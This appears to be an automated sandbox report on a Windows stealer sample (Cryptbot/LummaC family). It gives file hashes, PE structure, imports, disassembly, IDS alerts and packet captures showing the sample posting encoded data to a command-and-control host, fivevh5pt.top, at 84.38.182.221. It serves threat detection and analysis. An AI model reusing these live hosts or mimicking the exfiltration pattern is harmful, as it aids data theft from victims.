	file.exe	Get hash	malicious	LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Socks5Systemz	Browse	176.113.115.95
	file.exe	Get hash	malicious	LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer	Browse	5.53.124.195
	https://asmafree.com/	Get hash	malicious	Unknown	Browse	188.246.235.221
	http://303456.xyz/	Get hash	malicious	Unknown	Browse	45.145.74.124

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	315803136
Entropy (8bit):	0.05434753529749484
Encrypted:	false
SSDEEP:	49152:TTGv1WxnKPxX8L1111111111111111111111111111111111111111111111R:T6V18
MD5:	220AAD81B012673AD31832ECE7614AE1
SHA1:	AC0FE21347575ADC2E9DB64E9BB79271E543164C
SHA-256:	E89B892A639E4C8AD105F6E2C3282D5D4B79926868C6AA244294EABF01F2C625
SHA-512:	5B469F034C7C7194445BD4F679E54F95D0121BEAAAC8BE715E705AF940915F6C37C107AAEA3B5F3DC2C6E1124B8B00A10EE0313725957C6EB4422340617C32FA
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f...........#...(..........................$k.........................@.......`....@... .........................`.......................................@z...........................=.........................t............................text...8...........................`..`.data...............................@....rdata..0...........................@..@.eh_framX...........................@..@.bss.........p...........................edata..`............:..............@..@.idata...............<..............@....CRT....,............F..............@....tls.................H..............@....reloc..@z.......\|...J..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\service123.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	314617856
Entropy (8bit):	0.0023405989925417807
Encrypted:	false
SSDEEP:
MD5:	F48DE3A26F00253050481FA7F5CD3EC3
SHA1:	6CEE0DEDD2117589F1DDCBD162165B66EC8A421D
SHA-256:	8C909FBA9151A9D636A3430A5D4149F0D22817267D97CECDFA48953B2B7D7452
SHA-512:	12BCFCD5693566B021E7C2E4D16FB81FF4DAE519CB1931449F8E1896D63DBE9780630EE06243FC02FC8E0479F0BF6272FF301E983AB7762383CAE5A232AB8449
Malicious:	true
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f...............(.v........................@.......................... ...........@... .................................................................d...........................D.......................T................................text....t.......v..................`..`.data...T............z..............@....rdata...............\|..............@..@.eh_fram............................@..@.bss....t................................idata..............................@....CRT....0...........................@....tls................................@....reloc..d...........................@..B........................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	2.7737530246461977
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	9'969'664 bytes
MD5:	18e1d0f8b01ceae85d5d7136c4cf751a
SHA1:	6d79a8cb0795d48ddf9bcf3ff97af16a4508f770
SHA256:	d73bea0eaec1c09fe508f58746a99586c3369be41d08845ba12764a4b2f2a147
SHA512:	22f0cbbf9bcb2f5a1486cf0311ea298950a757af5eb2fbca0cf41cd8513b471eedc81a83db72d99d06cd7aa64d44ad836616f2115e622521a76cf0e90bffa0d4
SSDEEP:	49152:BdDlHdR359lFG9h1347FDDMDquN8qA9NiqaSDT8nfcM8YF1ai:HDlHdZ59li4JMm
TLSH:	D9A60A62ED8791EDF14708B8A009B3BF5634A715881DEA3CDF40EBD1E73297CD4AA215
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~..f...............(..+...................,...@.......................................@... .........................B..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4014a0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x66F7D87E [Sat Sep 28 10:20:46 2024 UTC]
TLS Callbacks:	0x401800, 0x4017b0
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	208ad2c8c137e3d4c33022e4bb87e9bb

Entrypoint Preview

Instruction
mov dword ptr [00D3F070h], 00000001h
jmp 00007F98DC67D886h
nop
mov dword ptr [00D3F070h], 00000000h
jmp 00007F98DC67D876h
nop
sub esp, 1Ch
mov eax, dword ptr [esp+20h]
mov dword ptr [esp], eax
call 00007F98DC68BF86h
cmp eax, 01h
sbb eax, eax
add esp, 1Ch
ret
nop
nop
nop
nop
nop
nop
nop
nop
push ebp
mov ebp, esp
push edi
push esi
push ebx
sub esp, 1Ch
mov dword ptr [esp], 00D32000h
call dword ptr [00D4122Ch]
sub esp, 04h
test eax, eax
je 00007F98DC67DC45h
mov ebx, eax
mov dword ptr [esp], 00D32000h
call dword ptr [00D4124Ch]
mov edi, dword ptr [00D41234h]
sub esp, 04h
mov dword ptr [00D3F028h], eax
mov dword ptr [esp+04h], 00D32013h
mov dword ptr [esp], ebx
call edi
sub esp, 08h
mov esi, eax
mov dword ptr [esp+04h], 00D32029h
mov dword ptr [esp], ebx
call edi
sub esp, 08h
mov dword ptr [006C1004h], eax
test esi, esi
je 00007F98DC67DBE3h
mov dword ptr [esp+04h], 00D3F02Ch
mov dword ptr [esp], 00D3C104h
call esi
mov dword ptr [esp], 00401580h
call 00007F98DC67DB33h
lea esp, dword ptr [ebp-0Ch]
pop ebx
pop esi

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x940000	0x42	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x941000	0xa98	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x944000	0x43b88	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x93ad24	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x94120c	0x1a8	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2bfae8	0x2bfc00	c5442317ed9af75d0008503ce8b95fa6	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x2c1000	0x670fc4	0x671000	f57d7419a7cafaed1170965a385aaf92	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x932000	0x9e54	0xa000	45898605f009fab9093f805216fc9660	False	0.3743408203125	data	4.383405388911367	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.eh_fram	0x93c000	0x21d8	0x2200	6d37e58695bec13ca1a87591b9b94043	False	0.32479319852941174	data	4.846068798335782	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss	0x93f000	0xb74	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata	0x940000	0x42	0x200	7b15e9c86a98cd3550a29c5b3214fa28	False	0.12109375	data	0.6450512701297626	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.idata	0x941000	0xa98	0xc00	34903145c76e6d6c3b2954f79af2d238	False	0.3821614583333333	data	4.8240568780640345	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x942000	0x30	0x200	947565758601e59a9e2e145caaaaefe2	False	0.064453125	data	0.2044881574398449	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x943000	0x8	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x944000	0x43b88	0x43c00	92457c917b4c4060a4d4cbe6e09cab55	False	0.2149698743081181	data	6.8359964707289675	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
ADVAPI32.dll	CryptAcquireContextA, CryptGenRandom, CryptReleaseContext
KERNEL32.dll	DeleteCriticalSection, EnterCriticalSection, FreeLibrary, GetLastError, GetModuleHandleA, GetModuleHandleW, GetProcAddress, GetStartupInfoA, GetTempPathA, InitializeCriticalSection, IsDBCSLeadByteEx, LeaveCriticalSection, LoadLibraryA, MultiByteToWideChar, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery, WideCharToMultiByte, lstrlenA
msvcrt.dll	__getmainargs, __initenv, __mb_cur_max, __p__acmdln, __p__commode, __p__fmode, __set_app_type, __setusermatherr, _amsg_exit, _assert, _cexit, _errno, _chsize, _exit, _filelengthi64, _fileno, _initterm, _iob, _lock, _onexit, _unlock, abort, atoi, calloc, exit, fclose, fflush, fgetpos, fopen, fputc, fread, free, freopen, fsetpos, fwrite, getc, islower, isspace, isupper, isxdigit, localeconv, malloc, memcmp, memcpy, memmove, memset, mktime, localtime, difftime, _mkdir, perror, puts, realloc, remove, setlocale, signal, strchr, strcmp, strerror, strlen, strncmp, strncpy, strtol, strtoul, tolower, ungetc, vfprintf, time, wcslen, wcstombs, _stat, _write, _utime, _open, _fileno, _close, _chmod
SHELL32.dll	ShellExecuteA

Exports

Name	Ordinal	Address
main	1	0x5ac130

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-29T00:53:24.312365+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.5	49725	84.38.182.221	80	TCP
2024-09-29T00:53:27.885702+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.5	49729	84.38.182.221	80	TCP
2024-09-29T00:53:32.795410+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.5	49730	84.38.182.221	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 29, 2024 00:53:23.066454887 CEST	49725	80	192.168.2.5	84.38.182.221
Sep 29, 2024 00:53:23.071548939 CEST	80	49725	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:23.071707964 CEST	49725	80	192.168.2.5	84.38.182.221
Sep 29, 2024 00:53:23.071950912 CEST	49725	80	192.168.2.5	84.38.182.221
Sep 29, 2024 00:53:23.071950912 CEST	49725	80	192.168.2.5	84.38.182.221
Sep 29, 2024 00:53:23.079853058 CEST	80	49725	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:23.079859018 CEST	80	49725	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:24.312220097 CEST	80	49725	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:24.312227964 CEST	80	49725	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:24.312236071 CEST	80	49725	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:24.312263966 CEST	80	49725	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:24.312365055 CEST	49725	80	192.168.2.5	84.38.182.221
Sep 29, 2024 00:53:24.312365055 CEST	49725	80	192.168.2.5	84.38.182.221
Sep 29, 2024 00:53:24.312365055 CEST	49725	80	192.168.2.5	84.38.182.221
Sep 29, 2024 00:53:24.312422037 CEST	49725	80	192.168.2.5	84.38.182.221
Sep 29, 2024 00:53:24.321295023 CEST	80	49725	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:27.819293976 CEST	49729	80	192.168.2.5	84.38.182.221
Sep 29, 2024 00:53:27.825685024 CEST	80	49729	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:27.825778008 CEST	49729	80	192.168.2.5	84.38.182.221
Sep 29, 2024 00:53:27.826510906 CEST	49729	80	192.168.2.5	84.38.182.221
Sep 29, 2024 00:53:27.826611996 CEST	49729	80	192.168.2.5	84.38.182.221
Sep 29, 2024 00:53:27.832854033 CEST	80	49729	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:27.832932949 CEST	49729	80	192.168.2.5	84.38.182.221
Sep 29, 2024 00:53:27.832932949 CEST	80	49729	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:27.832937956 CEST	80	49729	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:27.832942009 CEST	80	49729	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:27.832945108 CEST	80	49729	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:27.832948923 CEST	80	49729	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:27.833009005 CEST	49729	80	192.168.2.5	84.38.182.221
Sep 29, 2024 00:53:27.833113909 CEST	49729	80	192.168.2.5	84.38.182.221
Sep 29, 2024 00:53:27.833195925 CEST	80	49729	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:27.833200932 CEST	80	49729	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:27.833276987 CEST	49729	80	192.168.2.5	84.38.182.221
Sep 29, 2024 00:53:27.833313942 CEST	80	49729	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:27.833317995 CEST	80	49729	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:27.833398104 CEST	49729	80	192.168.2.5	84.38.182.221
Sep 29, 2024 00:53:27.839122057 CEST	80	49729	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:27.839127064 CEST	80	49729	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:27.839143038 CEST	80	49729	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:27.839147091 CEST	80	49729	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:27.839184999 CEST	80	49729	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:27.839189053 CEST	80	49729	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:27.839237928 CEST	49729	80	192.168.2.5	84.38.182.221
Sep 29, 2024 00:53:27.839272022 CEST	49729	80	192.168.2.5	84.38.182.221
Sep 29, 2024 00:53:27.885416985 CEST	80	49729	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:27.885701895 CEST	49729	80	192.168.2.5	84.38.182.221
Sep 29, 2024 00:53:27.937380075 CEST	80	49729	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:27.937475920 CEST	49729	80	192.168.2.5	84.38.182.221
Sep 29, 2024 00:53:27.985462904 CEST	80	49729	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:27.985549927 CEST	49729	80	192.168.2.5	84.38.182.221
Sep 29, 2024 00:53:28.037440062 CEST	80	49729	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:28.037652969 CEST	49729	80	192.168.2.5	84.38.182.221
Sep 29, 2024 00:53:28.085417986 CEST	80	49729	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:28.085778952 CEST	49729	80	192.168.2.5	84.38.182.221
Sep 29, 2024 00:53:28.133440018 CEST	80	49729	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:28.297214985 CEST	80	49729	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:28.758789062 CEST	80	49729	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:28.758862972 CEST	80	49729	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:28.758956909 CEST	49729	80	192.168.2.5	84.38.182.221
Sep 29, 2024 00:53:28.758956909 CEST	49729	80	192.168.2.5	84.38.182.221
Sep 29, 2024 00:53:28.765208960 CEST	80	49729	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:31.974780083 CEST	49730	80	192.168.2.5	84.38.182.221
Sep 29, 2024 00:53:31.981530905 CEST	80	49730	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:31.981626034 CEST	49730	80	192.168.2.5	84.38.182.221
Sep 29, 2024 00:53:31.985862970 CEST	49730	80	192.168.2.5	84.38.182.221
Sep 29, 2024 00:53:31.985862970 CEST	49730	80	192.168.2.5	84.38.182.221
Sep 29, 2024 00:53:31.992109060 CEST	80	49730	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:31.992120028 CEST	80	49730	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:31.992130041 CEST	80	49730	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:31.992182970 CEST	80	49730	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:31.992230892 CEST	49730	80	192.168.2.5	84.38.182.221
Sep 29, 2024 00:53:31.993839979 CEST	80	49730	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:31.993850946 CEST	80	49730	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:31.993860006 CEST	80	49730	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:31.993870974 CEST	80	49730	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:31.993947983 CEST	49730	80	192.168.2.5	84.38.182.221
Sep 29, 2024 00:53:31.998394012 CEST	80	49730	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:31.998404980 CEST	80	49730	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:31.998421907 CEST	80	49730	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:31.998430967 CEST	80	49730	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:31.998567104 CEST	49730	80	192.168.2.5	84.38.182.221
Sep 29, 2024 00:53:31.998924017 CEST	80	49730	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:31.998934031 CEST	80	49730	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:31.998997927 CEST	80	49730	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:32.000137091 CEST	80	49730	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:32.028407097 CEST	49730	80	192.168.2.5	84.38.182.221
Sep 29, 2024 00:53:32.034764051 CEST	80	49730	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:32.795248985 CEST	80	49730	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:32.795409918 CEST	49730	80	192.168.2.5	84.38.182.221
Sep 29, 2024 00:53:32.795454979 CEST	80	49730	84.38.182.221	192.168.2.5
Sep 29, 2024 00:53:32.795519114 CEST	49730	80	192.168.2.5	84.38.182.221
Sep 29, 2024 00:53:32.801634073 CEST	80	49730	84.38.182.221	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 29, 2024 00:53:22.649847984 CEST	59566	53	192.168.2.5	1.1.1.1
Sep 29, 2024 00:53:23.060422897 CEST	53	59566	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 29, 2024 00:53:22.649847984 CEST	192.168.2.5	1.1.1.1	0xce3e	Standard query (0)	fivevh5pt.top	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 29, 2024 00:53:09.886145115 CEST	1.1.1.1	192.168.2.5	0x5ec2	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 29, 2024 00:53:09.886145115 CEST	1.1.1.1	192.168.2.5	0x5ec2	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Sep 29, 2024 00:53:23.060422897 CEST	1.1.1.1	192.168.2.5	0xce3e	No error (0)	fivevh5pt.top		84.38.182.221	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

fivevh5pt.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49725	84.38.182.221	80	2228	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Sep 29, 2024 00:53:23.071950912 CEST	332	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary20269735 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 411 Host: fivevh5pt.top
Sep 29, 2024 00:53:23.071950912 CEST	411	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 32 30 32 36 39 37 33 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4d 6f 71 Data Ascii: ------Boundary20269735Content-Disposition: form-data; name="file"; filename="Moqofij.bin"Content-Type: application/octet-stream{sVr%Ju#&)L=?\|0?CI8(_p^Lu`%V8AB[D^07XcC"t6{kwq
Sep 29, 2024 00:53:24.312220097 CEST	209	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 (Ubuntu) Date: Sat, 28 Sep 2024 22:53:23 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK
Sep 29, 2024 00:53:24.312263966 CEST	209	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 (Ubuntu) Date: Sat, 28 Sep 2024 22:53:23 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49729	84.38.182.221	80	2228	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Sep 29, 2024 00:53:27.826510906 CEST	334	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary45974977 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 89154 Host: fivevh5pt.top
Sep 29, 2024 00:53:27.826611996 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 34 35 39 37 34 39 37 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 57 69 6d Data Ascii: ------Boundary45974977Content-Disposition: form-data; name="file"; filename="Wimedu.bin"Content-Type: application/octet-streamWf3<[X#Kc&N\|PokX\|s$hSoBMyX>/8?B@}pVE)e=B
Sep 29, 2024 00:53:27.832932949 CEST	1236	OUT	Data Raw: b7 1a 0a 4b 2b ad 4c 4c 96 67 a6 2d 78 3a d3 6d e5 86 53 58 4a 69 ad 81 70 c4 c1 21 22 7a 56 25 d0 d6 24 d7 24 c4 64 e5 5f 1e e0 27 b5 ca 05 f7 98 16 69 09 9b c2 73 33 10 7c f9 93 5a 90 c4 7c 6d 04 ca ec 0b 9d 56 34 55 38 9d 91 e6 55 09 6d ef 36 Data Ascii: K+LLg-x:mSXJip!"zV%$$d_'is3\|Z\|mV4U8Um6s$rfpUAbEi7'afUw!r-Vu$bEU\|/?z^WMmm3Y5jSr77\|x_q }B$*vkT_I(FepM(z'\
Sep 29, 2024 00:53:27.833009005 CEST	7416	OUT	Data Raw: a3 2d 57 3a 36 05 13 63 ac 42 52 1e 8a f4 87 0c 83 55 e9 91 66 f0 82 49 76 f0 67 77 3c df 36 83 4a 80 6a 05 0a ed 26 62 c6 8a 5f bf 0e a5 7a cd 45 a1 9a 45 cf c1 bd fe fb 7c 4d ae 59 b0 05 eb b7 a0 59 d2 a1 bb 9d 74 1a 5b 06 f2 20 35 17 55 79 7b Data Ascii: -W:6cBRUfIvgw<6Jj&b_zEE\|MYYt[ 5Uy{SP/-N`=dUAmFAqi!C3BOTXk>K'>_4b{l"Ke[;G]gRw'6 Q2Y+jwX`:rWpkM#gu
Sep 29, 2024 00:53:27.833113909 CEST	4944	OUT	Data Raw: 3b f5 5a 12 3c 18 af 32 23 f4 8b ba eb bf b6 b8 70 2c 28 c4 81 78 d2 67 9e 1a 39 4a e5 bc c1 2e 9a e7 76 bd 73 1d 40 0c 3a 31 e1 3d fb 10 ec 5d 07 e4 02 a6 cc 3b bd fe cf b7 91 bf 7c c3 95 9c 36 cc 13 36 d4 4d 2f 95 a4 3d ed 9e a1 a9 ea 27 5b b7 Data Ascii: ;Z<2#p,(xg9J.vs@:1=];\|66M/='[ VKQhWT`9k<s~QJb8IM@w<8tHoM8D=-]7kbzTyeJL7OSxSQXUk;"9Qp+Su7+K$
Sep 29, 2024 00:53:27.833276987 CEST	4944	OUT	Data Raw: 72 e0 3f c2 01 c1 75 34 d4 26 cf 41 92 15 6d 70 14 11 d8 28 ed 2b b8 58 81 9d f2 81 b6 b7 e2 f6 38 d9 37 cd 12 64 ed 9e b6 d8 70 cf 20 61 8c 03 d4 6e 54 ec e4 a7 01 3a 62 9d 38 8a 10 7e df fc 1e f9 ec 2b a2 df c6 7c 2b 1a d9 0b 58 23 dd 42 6b 82 Data Ascii: r?u4&Amp(+X87dp anT:b8~+\|+X#Bk_u,#f-E$Hn@%"/;?ykBl<9fraqF'9'!0nKa.R?{ NnzIbz@]<Z15PC
Sep 29, 2024 00:53:27.833398104 CEST	4944	OUT	Data Raw: 9a 5d a4 2f 6f 9e b7 67 7b 38 37 47 68 51 3e d6 b2 00 1f f2 a4 d6 74 72 d6 04 f5 33 f4 51 5a da 0b 16 3c 95 97 63 88 25 e6 dc c9 11 bd a5 af a6 65 c5 cc 3f 23 4f 67 c0 68 b0 fb 06 ae 85 e3 77 54 8a bd d2 82 86 f2 98 18 c9 38 db c4 24 af 58 aa 35 Data Ascii: ]/og{87GhQ>tr3QZ<c%e?#OghwT8$X5Grv=KgA{QM4`LOoe\JQgOPZdHJm29'AW=006U`hQJ(o]h/6079,aBOWXwV\|
Sep 29, 2024 00:53:27.839237928 CEST	9888	OUT	Data Raw: 86 bc c8 cf ad 74 0b 7a 8a 7e f7 bb 6c 9b ba 50 a8 90 32 8c 08 0f de 38 49 c9 ef 7e 13 ca 06 8a a7 8e 76 48 0e 5c fe 72 49 1b 3e 9b 3b 46 21 3b 72 f0 5f d3 c2 a9 59 89 a8 ec 36 f3 85 8a d3 2e 52 e7 66 82 18 28 47 5f 2d c2 25 8e 08 44 06 f4 be ca Data Ascii: tz~lP28I~vH\rI>;F!;r_Y6.Rf(G_-%DO_Ksw?3g\|g#DX$uxn!UP,#]^_3L!Ge_Ad$v&Pb%{M2a)"`##=:VwCtX*.;x[RQB`Zf\o
Sep 29, 2024 00:53:27.839272022 CEST	4944	OUT	Data Raw: 9e f2 c2 c2 43 d3 59 9c 56 38 13 c0 5c 8d c3 a6 2a 54 5c 0e f9 09 be ff af 3d bc 10 34 35 d0 3f 7e 46 0c 71 cf c9 9e da 64 42 fd ce ab 15 bd 50 c0 66 3b df d3 ad 1d 17 a7 2b 0f 5b 73 37 89 c9 8a 46 0e 38 7a e6 af e7 22 5e 31 97 7f fb 7f ef 96 64 Data Ascii: CYV8\T\=45?~FqdBPf;+[s7F8z"^1d;U8+`io7sA-S;WP;Y=lG@[hE'Z75'TRvqov+F:bB&9mclMJ8pM%aI^&AA%y]X"M5
